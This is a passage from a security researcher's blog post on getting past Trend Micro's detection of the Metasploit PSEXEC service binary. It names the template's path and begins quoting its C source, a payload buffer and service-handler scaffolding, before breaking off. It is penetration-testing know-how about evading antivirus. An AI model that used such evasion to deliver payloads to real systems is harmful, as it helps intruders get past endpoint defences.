Channel: All Posts - Malicious Link - Blog by mubix - Rob Fuller

Bypassing Trend Micro's Service Protection

@jabjorkhaug posed the following question on Twitter today:

I figured I could solve this and it would be an interesting challenge. Here is what it gets detected as:

The service binary that is used as part of PSEXEC is located here:

MSF Directory/data/templates/src/pe/exe/service/service.c

The important part to look at starts at line 57:

    #define WIN32_LEAN_AND_MEAN
    #include <windows.h>

    #define PAYLOAD_SIZE 8192

    char cServiceName[32] = "SERVICENAME";
    char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";

    SERVICE_STATUS ss;
    SERVICE_STATUS_HANDLE hStatus = NULL;

    /*
     *
     */
    BOOL ServiceHandler( DWORD dwControl )
    {
        if( dwControl == SERVICE_CONTROL_STOP || dwControl == SERVICE_CONTROL_SHUTDOWN )
        {
            ss.
